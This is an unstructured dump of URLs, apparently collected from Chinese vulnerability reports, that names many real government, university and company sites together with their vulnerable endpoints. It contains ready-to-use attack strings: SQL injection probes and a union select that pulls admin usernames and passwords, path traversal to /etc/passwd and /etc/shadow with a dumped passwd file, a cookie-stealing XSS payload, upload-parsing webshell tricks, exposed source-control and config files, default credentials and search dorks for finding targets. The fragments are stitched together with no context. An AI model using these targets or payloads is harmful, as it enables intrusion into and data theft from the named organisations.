gjzb.dooland.com/float_check_cart.php glmjpl.dooland.com/float_check_cart.php globalpeople.dooland.com/float_check_cart.php glxjsjb.dooland.com/float_check_cart.php artvalue.dooland.com/float_check_cart.php(所有涉及到SQL注入的页面都是这样的) http://zgzj.fjtelecom.com/shownews.aspx http://a.bdqn.cn/pb/pbmain/page/users/user_loginBefore.action http://i.bdqn.cn/getpassword?a=MTY1ODAwCU5OdTE1dAkxNDE4MTA2NzA0CWt0dHA6Ly9ob21lLmJkcW4uY24%3D http://home.bdqn.cn7 http://125.39.1.54/index.action http://www.xmnet8.com/ http://www.nfree.cn/ http://meepo.lzu.edu.cn/meepo/login!login.do http://www.ycxl.net/ http://oa.it.mobogarden.com/jira/browse/MWT-435?jql= http://117.78.0.247 http://yourname.duapp.com/bae.php,即可读取到 http://www.xyxzspfw.gov.cn/index_38.do http://www.xyxzspfw.gov.cn/index_38.do http://www.fxiaoke.com http://61.174.22.170/link/link.asp http://61.174.22.170/WebEditor/admin_login.asp http://61.174.22.170/webeditor/db/ewebeditor.mdb http://www.hxjnyy.com/gd/newsview.asp?anclassid=8&nclassid=37&nnclassid=0&bookid=2987%20and%201=1(正常) http://www.hxjnyy.com/gd/newsview.asp?anclassid=8&nclassid=37&nnclassid=0&bookid=2987%20and%201=2(错误) http://www.labi.com/feedback/userThreadFeedback?page=1&ir=1&parentId=12035 http://admin.gozap.com www.gozap.comjabber,成功登录总管理 http://x.x.x.x/webengine/data/online.txt http://**.**.**/download.casf=android http://218.197.80.9/login.html http://218.197.80.9 http://www.sdlgcj.net/sdlgcj/index.jsp http://www.hbpp.com.cn/about.php?typeid=7 http://202.116.160.99:8181/login/NoticeList.aspx?type=normal http://oa.52mf.cn/wui/theme/ecology7/page/login.jsp?templateId=1 http://jiuye.hebau.edu.cn/test.rar http://www.bjtel.cn/ http://www.bjtel.cn/shell.asp;.jpg http://www.bjtel.cn/admin/ http://www.bjtel.cn/kode/ http://www.fycj.gov.cn/admin/ http://www.chanpay.com/busi/tradingQueryManage.do?action=findPhoneQueryInfo&orderId=10000000000132030 http://223.252.196.25/ http://223.252.196.25/data.tar http://1.85.36.34/LoginFail.htm http://baozou.com/makers/1 http://www.xinhucaifu.com/news.php?id=156 http://223.202.19.96/.git/config http://ask.lenovo.com.cn/.git/config http://219.141.216.74/.git/config http://219.148.86.44/iden/ http://219.148.86.44/iden/loginUserController!login.action http://221.6.35.202/ http://221.6.35.202:8089/ http://me.ctrip.com/hotel/myCtrip/login.html https://openapi.ctrip.com/LogicSVR/AjaxServerNew.ashx http://localhost/uwa/index.php?g=member&c=archive&a=add_archive&archive_model_id=2 http://218.56.99.84:8003/webcwgkcun.aspx?deptid=3946 http://61.133.119.187:8091/webcwgkcun.aspx?deptid=155 http://222.135.76.147:8200/webcwgkcun.aspx?deptid=203 http://123.134.189.60:8022/webcwgkcun.aspx?deptid=4627 http://221.2.156.181:8800/webcwgkcun.aspx?deptid=162 http://222.135.109.70:8200/webcwgkcun.aspx?deptid=168 http://60.217.72.17:7129/webcwgkcun.aspx?deptid=3950 http://222.134.66.54:8014/webcwgkcun.aspx?deptid=3949 http://123.103.108.50/uc_server http://bbs.uctools.net/uc_server vroom.show.sina.com.cn/www/inc/SSOCookie.class.php uniqueid:userid:appgroup:displayname:gender:paysign client.show.sina.com.cn/www/inc/cookie.conf http://sfc.tanljgzx.gov.cn/SysManage/CunShow.aspx?id= http://222.135.109.70:8300/SysManage/CunShow.aspx?id= http://221.2.149.47:8300/SysManage/CunShow.aspx?id= http://60.217.72.17:7082/SysManage/CunShow.aspx?id= http://218.56.159.98:8002/SysManage/CunShow.aspx?id= http://222.134.66.54:8013/SysManage/CunShow.aspx?id= http://221.2.171.59:8100/SysManage/CunShow.aspx?id= http://222.135.76.147:8300/SysManage/CunShow.aspx?id= http://218.56.40.229:8050/SysManage/CunShow.aspx?id= http://218.56.99.84:8002/SysManage/CunShow.aspx?id= http://222.134.154.214:8002/SysManage/CunShow.aspx?id= http://www.ztehome.com.cn/,存在SQL注入。存在问题的地方: http://www.ztehome.com.cn/support/serviceSearchRslt.php?tcategory=&tsearch=1 http://218.22.27.67/Ahzrjj/index.action主页提交如下post http://vdisk.weibo.com/s/FqM2gASvpayTf?category_id=0&parents_ref=FqM2gASvpaz5n%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C http://www.gs9999.com/ http://drops.wooyun.org/wp-content/uploads/2014/12/细节.avi http://bbs.dospy.com http://www.ecs.cn/ http://www.qzxx.net/operationmanage/selectunitmember.aspx为例 http://www.qzxx.net/operationmanage/selectunitmember.aspx http://demo.ecs.cn/operationmanage/selectunitmember.aspx http://www.runoqd.com/index.aspx http://58.58.34.98:8096/Login.aspx http://www.cloud511.com/case http://www.smdyf.cn/getProductInfo.do?productId=148222 http://www.zjrrt.com/getProductInfo.do?productId=249209 http://www.ewj2009.com/getProductInfo.do?productId=247012 http://test1.zjtydyf.com/getProductInfo.do?productId=248254 http://www.46buy.com/getProductInfo.do?productId=243223 http://test.jhtht.com/getProductInfo.do?productId=101955 http://www.sydyf.com/getProductInfo.do?productId=14416 http://www.jylbx.com/getProductInfo.do?productId=247701 http://test.gxjjls.com/getProductInfo.do?productId=250586 http://www.hangzhoudrt.com/getProductInfo.do?productId=246206 www.zbsq.gov.cn右侧搜索处搜索 http://222.135.127.190:7000/cungk.aspx?vid=000611 http://61.133.119.187:8089/cungk.aspx?vid=001359 http://218.56.99.84:8000/cungk.aspx?vid=000330 http://123.134.189.60:8008/cungk.aspx?vid=000052 http://218.58.124.131:8002/cungk.aspx?vid=000141 http://www.zibosti.gov.cn/books/index.asp http://y.yiban.cn/phpinfo.php https://mail.cyou-inc.com http://120.35.26.113:9080/ gt.17y.com/bbs http://117.27.157.25:8090/qzbas/selectAreaInfo!listParentAreaInfo.action http://125.35.5.234:81/ URL:http://125.35.5.234:81/checkuser.asp?loginname=admin&pwd=1 http://document.thinkphp.cn/manual_3_2.html#express_query http://tbbs.haier.com/crossdomain.xml http://tbbs.haier.com/HaierBBS/test.jsp http://tbbs.haier.com/was5/web/login.jsp http://tbbs.haier.com/ http://www.nicpbp.org.cn/biaogzx/login.do?formAction=home http://**.**.**/posGate.html inurl:poweb http://www.xxoo.com/poweb/findisoforjson?callback=C&isbn=xxx-x-xxxx-xx&uri=www.xxoo.com/poweb&date=&_xx1418215264814=1 http://210.32.137.198/ http://210.32.137.198//findisoforjson?callb http://drops.wooyun.org/tips/3939,其中提到了mongodb一种注入方式: http://wooyun.org/bugs/wooyun-2010-086474,也从侧面印证了一个问题,这个特性(获得的GP可以是字符串也可以是数组)不仅仅是PHP存在,只要框架支持,那么就可以存在。 http://document.thinkphp.cn/manual_3_2.html#express_query http://vip.uc.cn/uvip_help/op.jsp http://www.cdws.gov.cn/web/mail_book/visitshow.asp?id=24 http://guard.qq.com/overview/o_index/xxxxx http://guard.qq.com/overview/o_index/appid http://guard.qq.com/overview/o_pg/appid intitle:FE协作办公平台5.5 http://oa.chnjcdc.com:9090/common/treeXml.jsp?type=sort&lx=3&code=1 http://oa.shunhengli.com:9090/common/treeXml.jsp?type=sort&lx=3&code=1 http://120.236.136.75/common/treeXml.jsp?type=sort&lx=3&code=1 http://fm.eyesoffice.com:9090/common/treeXml.jsp?type=sort&lx=3&code=1 http://shanxi.beijing-hualian.com:88/myup.asp http://shanxi.beijing-hualian.com:88/helps/_notes/reDuh.aspx http://rwb.whu.edu.cn/admin/Login.asp http://ceec.tju.edu.cn/zhiyao.php?id=76这个站点已经被黑了 http://ceec.tju.edu.cn/news_content.php?id=6 http://ceec.tju.edu.cn/admin/ http://www.sunnychina.com/ http://yunying.xiuzheng.cc/cp_dha.php?id=9存在sql注入,可以拿到admin的密码。并能从返回的数据库信息找到后台,拿到权限。 http://www.xiuzheng.cc/warehouse/codeview.asp?view=view,查询字符未过滤。 http://dsrs.bjdev.com.cn:9090/Default.aspx http://www.bcrj.com.cn/ http://210.30.190.28/thesis/login.jsp?user=student http://210.30.190.28 http://nuser.gongkong.com/user/Activation/2815193 http://nuser.gongkong.com/user/getmypass http://nuser.gongkong.com/user/Activation/2815190 http://nuser.gongkong.com/user/Activation/2815190 www.oss.org.cn http://yp.oss.org.cn/blog/show_resource.php?resource_id=2330 http://www.jsdtrcb.com/ http://www.jsdtrcb.com/manage/editor/db/ewebeditor.mdb http://219.234.83.2/cqds/product.php?id=3060,sqlmap直接跑出库 http://www.tstraffic.gov.cn/cyportal/TemplateImag height:20px;BORDER http://www.foshandb.com/article.php?id=6947 http://www.xxoo.com/manage.do?method=manage_enter http://www.xxoo.com/manage.do?method=manage&page=1&UserType=-1 http://202.197.69.15:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://222.29.253.58:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://rom.hztsg.com:9091/poweb/manage.do?method=manage&page=1&UserType=-1 http://211.71.202.25:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://210.32.33.245:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://218.58.59.71:7272/poweb/manage.do?method=manage&page=1&UserType=-1 http://210.32.205.51:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://202.112.143.51:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://210.35.35.73:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://60.214.233.173:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://210.44.1.2:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://218.192.55.9/poweb/manage.do?method=manage&page=1&UserType=-1 http://202.197.69.15:8080/poweb/manage.do?method=manage_enter http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage_enter http://222.29.253.58:8080/poweb/manage.do?method=manage_enter http://rom.hztsg.com:9091/poweb/manage.do?method=manage_enter http://211.71.202.25:8080/poweb/manage.do?method=manage_enter http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage_enter http://210.32.33.245:8080/poweb/manage.do?method=manage_enter http://218.58.59.71:7272/poweb/manage.do?method=manage_enter http://210.32.205.51:8080/poweb/manage.do?method=manage_enter http://202.112.143.51:8080/poweb/manage.do?method=manage_enter http://210.35.35.73:8080/poweb/manage.do?method=manage_enter http://60.214.233.173:8080/poweb/manage.do?method=manage_enter http://210.44.1.2:8080/poweb/manage.do?method=manage_enter http://218.192.55.9/poweb/manage.do?method=manage_enter http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://www.juneyaoair.com/UnitOrderWebAPI/Book/GetTicketInfoByTktNo?ticketNo=018-XXXXXXXXXX http://888.sports.qq.com/tws/centerrecord/GetCenterRecord?mod=award&pagesize=10&page=0&type=jczq&days=30&_=14182187 http://www.esdjw.com.cn/ListPage.aspx?MenuID=E25F64429F304A63BDCA4A37746126C4 http://www.esdjw.com.cn/admin/UserList.aspx http://edu.baidu.com/marketing2014/SchoolResult.html http://218.27.126.42:8000/cgi/opr_login.ktcl http://218.28.166.74:8080/zzsbonline/register.jsp http://218.28.166.74:8080/zzsbonline/javascript/register/register.js http://218.28.166.74:8080/zzsbonline/secderAction!massSend?dst=手机号&msg=信息内容&time=&sender=&txt= https://**.**.**/cmkke/test2/blob/7e0b978af56c93c6ac8eb615ed67eae96bbc43fa/PospAdmin/src/.svn/text-base/config.properties.svn-base uff1ahttp://192.168.7.23:8989/POSPPG/services/autoAccountWS?WSDL uff1ahttp://192.168.7.167:8081/POSPPG/services/autoAccountWS?WSDL u5883http://192.168.7.222:8080/POSPPG/services/autoAccountWS?WSDL http://192.168.7.222:8080/POSPPG/services/autoAccountWS?WSDL http://www.e2go.com.cn/ www.e2go.com.cn)是基于长途客运联网售票系统建立的面向长途旅客的专业性门户网站。提供全北京各个长途汽车站点的网络售票服务。 http://yun.unionpay.com/Login!input.action https://github.com/cmkke/test2/blob/c1d9fc9c9210f3cc56fc801359eff60ba659690f/VAUM-WEB/WebRoot/WEB-INF/classes/constants.properties https://wallet.globebill.com http://**.**.** http://union.tiantian.com/admin.php http://www.ztehome.com.cn/存在敏感信息泄露, http://www.ztehome.com.cn/.bash_history www.baozoumanhua.com http://baozoumanhua.com/articles/帖子ID/dn http://baozoumanhua.com/articles/帖子ID/up http://baozoumanhua.com/articles/帖子ID/reward.json intitle:FE协作办公平台5.5 http://oa.chnjcdc.com:9090/security/treeXml.jsp?type=group&SG04= http://120.236.136.75/security/treeXml.jsp?type=group&SG04= http://123.234.131.50:9090/security/treeXml.jsp?type=group&SG04= http://fm.eyesoffice.com:9090/security/treeXml.jsp?type=group&SG04= IP:119.145.14.47:443 http://mcloud.yonyou.com/eccloud-inter/apishow!doNotNeedSession_apiMenu.do http://mcloud.yonyou.com/eccloud-inter/apishow!doNotNeedSession_apiMenu.do http://mcloud.yonyou.com/eccloud-inter/test.txt http://182.131.21.138/ccnt-apply/login_login.action http://www.strongsoft.net/ http://**.**.**/Res/CertificateFiles_ByStudents/10384/10384001/D9001223337.zip http://www.dzjpkc.qdedu.net/show.php?article_id=48 http://www.dzjpkc.qdedu.net/show.php?article_id=48 http://www.strongsoft.net/ http://220.181.185.164/.svn/entries svn://10.101.5.22/iku/src/stats/web svn://10.101.5.22/iku http://city1.jx139.com/X481d2a8318cee535096bf5f98c822c8/0/0/4/0797/index.php?module=Page&func=ClientDown&op=Detail&pid=4&v=1 www.xxx.com/do.php?act=shop_guestbook_del gd.91.com/index.php?comment-oppose https://zhishi.suning.com/zhishitang/photo/setting.jsp?custNum=5205000xxx;其中5205000xxx为用户B的id; https://github.com/andy-ruan/study/blob/1e0d3159e911b63c4534134f013e3c65da9e1656/python/python_comm/util/sendmail.py https://portal.qiyi.domain https://220.181.184.53/.svn/entries https://scm.qiyi.domain:18080/svn/portal_operation/trunk/res/public https://scm.qiyi.domain:18080/svn/portal_operation svn:special svn:externals svn:needs-lock https://portal.qiyi.domain/js/lib/fileupload/ajaxfileupload.php www.xxx.com/do.php?/do.php?act=add_transport_template www.xxx.com/do.php?act=shop_guestbook_del http://114.80.121.72/ http://114.80.121.72/ http://114.80.235.161:8083/v3/tpm-config.js http://114.80.235.161:8083/v3/sdm-config.json http://cssbeta.tudouui.com/v3 http://114.80.122.41/WEB-INF/web.xml http://114.80.122.41/WEB-INF/classes/applicationContext.xml http://114.80.122.41/WEB-INF/struts_config/struts-config-manager.xml http://**.**.**/AMRWeb/shopping/search/showSearchPage_amrshop.action www.xxx.com/do.php?act=shop_honor_update https://60.174.35.92/cgi/maincgi.cgi?Url=Main http://xinxigk.baodi.gov.cn/dirfirst.jsp?code=01 http://221.239.20.83/dirfirst.jsp?code=14 http://zfxxgk.bh.gov.cn/dirfirst.jsp?code=01 http://zwgk.tjhd.gov.cn:8000/dirfirst.jsp?code=01 http://222.36.5.104/dirfirst.jsp?code=01 http://gk.xq.gov.cn/dirfirst.jsp?code=02 http://60.30.65.156/dirfirst.jsp?code=03 http://xxgk.tjbc.cn/dirfirst.jsp?code=01 http://61.181.143.108/dirfirst.jsp?code=01 http://gk.tjhqqzf.gov.cn/dirfirst.jsp?code=01 http://gk.tjnk.gov.cn/dirfirst.jsp?code=01 http://218.69.106.201:8080/dirfirst.jsp?code=01 http://218.69.93.71/dirfirst.jsp?code=01 http://61.181.146.98:7002/dirfirst.jsp?code=01 http://221.122.117.196 http://test2.53kf.com/new/client.php?m=download&a=downloadFile&file=..%2F/../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin qemu:x:101:103:qemu user:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash http://www.wooyun.org/bugs/wooyun-2014-08****/trace/ed20224abd0c36fc2f4edac5fc875ed9 http://www.wooyun.org/bugs/wooyun-2014-08****/auth/ed20224abd0c36fc2f4edac5fc875ed9 http://live.findlaw.cn/iframe/zhishizhuanli_ask.php?sid2=31 http://bbs.english.sina.com http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt http://csir.whu.edu.cn/右侧搜索,看到有两个GET参数,其中参数searchkey未过滤导致SQL注入。 http://caipiao.taobao.com/lottery/seek/seekResponsePage.htm?seekId=10000001 http://caipiao.taobao.com/lottery/seek/seekResponsePage.htm?seekId=10000002 http://caipiao.taobao.com/lottery/seek/seekResponsePage.htm?seekId=10655001 http://www.mszhuanzhuan.com/app.zip http://101.95.48.76/biz/netplan/poi/hotArea!selectHotArea.action?page=/biz/netplan/coverBase/showNearSite.free&maintenances=&address=fsdsfdsf&types=&siteName= http://tdlz.nanning.gov.cn/ExtWebModels/WebFront/ShowNewsList.aspx?class=100005 http://demo.inongyou.cn/ExtWebModels/WebFront/ShowNewsList.aspx?class=100005 http://rctdlz.cn/ExtWebModels/WebFront/ShowNewsList.aspx?class=100007 http://demo9.nongyou.cn/ExtWebModels/WebFront/ShowNewsList.aspx?class=100013 http://demo2.sdhzs.com/ShowNewsList.aspx?class=1000100004 http://demo.caeo.cn/ExtWebModels/WebFront/ShowNewsList.aspx?class=100001 http://221.2.162.243:8044/ExtWebModels/WebFront/ShowNewsList.aspx?class=100002 http://121.17.2.52/ExtWebModels/WebFront/ShowNewsList.aspx?class=100006 http://222.135.127.190:8001/ShowNewsList.aspx?class=100001 http://61.186.154.210:8088/ShowNewsList.aspx?class=1000100002 http://www.nongyou.com.cn/ http://tdlz.nanning.gov.cn/ExtWebModels/WebFront/ShowNews.aspx?class=100005&id=1000100279 http://121.17.2.52/ExtWebModels/WebFront/ShowNews.aspx?class=100006&id=1000100344 http://rctdlz.cn/ExtWebModels/WebFront/ShowNews.aspx?class=100007&id=1000100486 http://demo9.nongyou.cn/ExtWebModels/WebFront/ShowNews.aspx?class=100013&id=1000100016 http://demo2.sdhzs.com/ShowNews.aspx?class=1000100004&id=1000100239 http://222.135.127.190:8001/ShowNews.aspx?class=100001&id=1000100372 http://221.1.104.11:8011/ExtWebModels/WebFront/ShowNews.aspx?class=100001&id=1000100307 http://61.186.154.210:8088/ShowNews.aspx?class=1000100002&id=1000100247 http://121.17.2.52:9999/ExtWebModels/WebFront/ShowNews.aspx?class=100001&id=1000100469 http://cemlab.uestc.edu.cn/admin/Session.asp http://124.128.34.217/Secure/Login.aspx http://210.41.193.86/zzadmin/admin.php/Index/index https://app.asana.com http://oldsp.hengyang.gov.cn/OnlineQuery/QueryDetail.aspx?QueryId=2085 http://bbs.coolpad.com/config/config_global.php.bak http://106.37.195.128:8888/ http://106.37.195.129/ https://www.ucfpay.com/member/valiPwd/download?fileName=../../../../../../../../../../etc/passwd https://www.ucfpay.com/member/valiPwd/download?fileName=../../../../../../../../../../etc/shadow http://www.zjlib.cn:8282/zjlib/page/newstext.jsp?newsid=70 http://temai.minshengec.com/ http://xqmobile.minshengec.com/productionport/preorderreview.jhtml?token=b457cb697e63c64beb537ad4e88a90ce×tamp=1417658530&loginToken=0dce8a6dece60e266ca026e71ad0f820&jsons={%22productArray%22%3A[{%22productId%22%3A%2220%22%2C%22sellNum%22%3A%222%22}]}&cyId=130 http://xqmobile.minshengec.com/javax.faces.resource.../WEB-INF/web.xml.jsf http://www.hvett.com.cn/index.php/portal/index/classdetail?class_id=1841&cid=6&leftmenuid=1 http://cie.zjgsu.edu.cn/ciecol/web/teacher_detail.jsp?id=114 http://www.55.la/run/ding_qq.php?bid=27 http://www.55.la/run/ding_logo.php?bid=696 http://www.55.la/run/ding_weblogo.php?bid=5292 http://www.zbcdc.com/info_Print.asp?ArticleID=214 http://183.62.26.11/ http://www.chinaecity.cn/ http://www.chinaecity.cn:80/ www.chinaecity.cn http://tijianzhan.nwpu.edu.cn/ http://cqjtfk.bypay.cn/wapTrans!seaFiOrder.ac http://www.wdhac.com.cn/xml/Cms_XML_GBK.jsp?optionalparam=-1&cf=3467&randomId=0.9538818406872451&actiontype=1&id=1201 http://**.**.**/_ http://www.clcn.net.cn/modules/guide/index.php?page_id=53 http://store.tdxinfo.com/tops-front-purchaser/order/flight/international/listOrder https://github.com/JeffXue/performance_monitor/blob/b49195e886ee5a6e3f625bb03c0d4b985f0b55ab/conf/Email.ini http://mail.gionee.com www.fxtiyu.com主站 http://114.247.0.103:8080/bill/d.h?attrs=XXXXXXXX http://zhlzh.mofcom.gov.cn/entp_user.jsp http://hvsop.youku.com/player.php?id=16 http://hvsop.youku.com/admin/ http://hvsop.youku.com/admin/_validate.php http://hvsop.youku.com/admin http://hvsop.youku.com/test/list.php?music=1 http://hvsop.youku.com//test/player.php?id=1 https://skydoc.baosteel.com/ http://115.239.167.194/setsys_backup.htm http://wcjy.zhjedu.cn/ http://static.wooyun.org/drops/20141124/201411241754IconDos.apk https://github.com/liu21st/thinkphp/commit/23c6e130ce75f2132e5b48699363a75ed28e15b2 http://jy.bucm.edu.cn/unitService/unit-register.action http://170web.com/cases_01.html http://e-ton.cn/data/%23data.mdb http://wasai.yy.com/admin/ http://wasai.yy.com/wsadm http://wasai.yy.com/super/login.html?r=/admin/ http://wasai.yy.com/wsadm。。。。会自动请求admin页。 http://wasai.yy.com/userInfoReq_s?json={%22UserInfoReq%22:{%22uid%22:0}}&_=1418196227753 http://wasai.yy.com/wl http://m.dfss.com.cn/dfssclient/DatingCarSearch.aspx?fchrWeiXinName=XX微信IDXX Version:4.0.30319 Version:4.0.30319.1 http://www.zhbj.gov.cn/zixunlook.aspx?bianma=05 http://sqlmap.org http://www.the365.com.cn:18801/web.rar https://115.182.208.54/RDWeb/Pages/zh-CN/login.aspx https://115.182.208.54/RDWeb/Pages/zh-CN/login.aspx https://115.182.208.54/RDWeb/Pages/zh-CN/login.aspx http://180.153.25.224/WeixinManagerWEB/Account/Login.aspx http://180.153.25.224/WeixinManagerWEB/weixinUser/UserManager.aspx http://tcm.iquanyou.com.cn/tcm/userLogin.action http://tcm.iquanyou.com.cn/tcm/frameLogin.jsp jdbc:mysql://192.168.14.132:3306/c jdbc:oracle:thin:@10.10.0.156:1521:tcm jdbc:oracle:thin:@10.10.0.57:1521:tcm jdbc:mysql://localhost:3306/mixca http://user.quanyou.com.cn/CardServer.wsdl http://gonggao.org.cn:18082/EBase/login/login.action行 http://monitor.minshengec.cn/cacti/index.php http://www.skyworth-ea.com/cn/product/productdetail.aspx?id=10000011734487 http://www.skyworth-ea.com/sysadmin/login.aspx http://hr.skyworth.com/jobadmin/FCKeditor/editor/filemanager/connectors/test.html https://58.248.49.138 http://exhibitcar.tudou.com/ http://www.74cms.com; http://hao.mumayi.cn/ http://hao.mumayi.cn/Adminlogin/Login http://hao.mumayi.cn/Adminlogin/Login http://www.lianyisoft.com/ http://tzgl.ynjy.cn/ http://hainan.zbglxt.com/ http://jx.lianyisoft.com/ http://hunan.lianyisoft.com/ http://sx.lianyisoft.com/ http://zbtj.hyedu.net.cn/ http://218.76.27.45:8062/ http://sc.zbglxt.com/ http://henan.zbglxt.com/ http://hb.zbglxt.com/ http://qh.zbglxt.com/ http://ah.zbglxt.com/ http://u.mumayi.com/?a=retrievepass http://www.yungoucms.cn/go/shaidan/detail/10 http://dev.mumayi.com/ http://dev.mumayi.com/index/login?username=test&password=test&logintype=0 http://dev.mumayi.com/index/login?username=test&password=test&logintype=0 inurl:showcareer.asp?id= http://www.lelegq.com/showcareer.asp?id=7 http://wengine.net/showcareer.asp?id=14 http://www.zbweiqi.com/showcareer.asp?id=9 http://www.yc600.cn/showcareer.asp?id=7 http://www.szxbjy.com/showcareer.asp?id=10 http://bdfz.com.cn/showcareer.asp?id=11 http://www.zhhhljy.com/showcareer.asp?id=12 http://www.hk-hanshi.com/showcareer.asp?id=12 http://www.hzjbyy.com/showcareer.asp?id=12 http://www.ydmedu.com/showcareer.asp?id=8 http://www.ydmedu.com/showcareer.asp?id=8 http://www.xiaolv.org/showcareer.asp?id=8 http://www.hssjy.com/showcareer.asp?id=8 http://jhhmby.com/showcareer.asp?id=7 http://www.hcwsg.com/showcareer.asp?id=8 http://www.guizhishen.cn/showcareer.asp?id=15 http://jyembed.com/showcareer.asp?id=13 http://www.acl56.com/showcareer.asp?id=10 http://www.jmxjjb.com/showcareer.asp?id=12 http://www.yjcjy.com/showcareer.asp?id=9 http://bbs.midea.com/ http://bbs.midea.com/bbs/config/config_global.php_bak http://www.ymatou.com/BuyerOrder/BuyerChangeAddress?orderId=102385600 http://www.zalvyou.com/ http://qing.shopping365.net/ http://www.czdfgl.com/ http://www.6028808.net/ http://www.gamekin.cn/ http://qing.shopping365.net/19/new_list.asp?sid=10 http://www.zalvyou.com/new_list.asp?sid=10 http://www.czdfgl.com/new_list.asp?sid=10 http://www.6028808.net/new_list.asp?sid=10 http://www.gamekin.cn/gk2/new_list.asp?sid=10 http://appbox.bbn.com.cn/appBoxN/servlet/Select?id=1&listName=e&t=1418457294062&userlogin=admin http://appbox.bbn.com.cn/appBoxN/servlet/netDisk?act=queryUserDisk&t=1418457298234&userId=-1 http://ecampus.sysu.edu.cn/zsuoa/vfs?path=../../../../../../etc/passwd http://xpb.ecjtu.jx.cn/后台弱口令,已被黑客拿webshell http://xpb.ecjtu.jx.cn/,一看,是织梦cms http://xpb.ecjtu.jx.cn/dede/ http://170web.com/ http://mastino.com.cn/contact.asp http://mastino.com.cn/prodetail.asp?id=52 http://mastino.com.cn/newsdetail.asp https://localhost/src/login.php?action_c=login&user_type=1&user=admin&pass=admin&nodeid=1 encoding:utf-8 http://tuchong.com inurl:products.asp?prolenid= inurl:product.asp?smtid= http://www.huquan.com//admin/upfile_flash.asp http://www.kwauto.com.cn//admin/upfile_flash.asp http://www.jindashebei.com//admin/upfile_flash.asp http://www.gdfupin.org.cn/web2//admin/upfile_flash.asp http://www.qile168.com//admin/upfile_flash.asp http://www.szdse.com//admin/upfile_flash.asp http://www.qfdns.net/ http://www.nxjxtfkt.com/ProView.Asp?ID=202%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,password,15%20from%20admin http://www.nxzxzs.com/ProView.Asp?ID=202%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,password,15%20from%20admin http://www.nxjxbz.com/ProView.Asp?ID=202%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,password,15%20from%20admin http://www.ystnz88.com/ProView.Asp?ID=202%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,password,15%20from%20admin http://wooyun.org/bugs/wooyun-2014-086690 http://bbs.haier.com/ http://www.freebuf.com/wp-admin/edit.php?post_type=post&author=001 http://www.xinhaisoft.com/ http://www.xinhaisoft.com/CustomerList.aspx http://www.xinhaisoft.com http://soft.psy.com.cn/2012/bistu//inc/upload.asp?fl=1.asp;1 http://www.jsgyzx.net/xinhaisoft//inc/upload.asp?fl=1.asp;1 http://psyhealth.must.edu.mo//inc/upload.asp?fl=1.asp;1 http://xinli.jlbtc.edu.cn/inc/upload.asp?fl=1.asp;1 http://www.jsgyzx.net/xinhaisoft//inc/upload.asp?fl=1.asp;1 http://www.pdyz.qdedu.net/xinli//inc/upload.asp?fl=1.asp;1 http://www1.avceit.cn/xinhaisoft//inc/upload.asp?fl=1.asp;1 http://www.hnpolice.com/xlzx//inc/upload.asp?fl=1.asp;1 http://xlzx.scun.edu.cn//inc/upload.asp?fl=1.asp;1 http://fshyschool.net/xinli//inc/upload.asp?fl=1.asp;1 http://61.49.8.153/inc/upload.asp?fl=1.asp;1 http://**.**.**/benefit/sysarticle.aspxarcid=121 http://**.**.**/Hlr/login.aspx www.xauat.edu.cn http://123.134.189.60:8013/WebDefault.aspx?CountryName=%e9%9b%aa%e9%87%8e%e6%97%85%e6%b8%b8%e5%8c%ba&level=0 http://218.56.40.229:8001/WebDefault.aspx?CountryName=%e7%83%9f%e5%8f%b0%e5%b8%82&level=0 http://218.58.124.131:8003/WebDefault.aspx?CountryName=%e9%ab%98%e6%96%b0%e5%8c%ba&level=1 http://222.134.154.214:8001/WebDefault.aspx?CountryName=%e5%8d%97%e9%ba%bb%e9%95%87&level=2 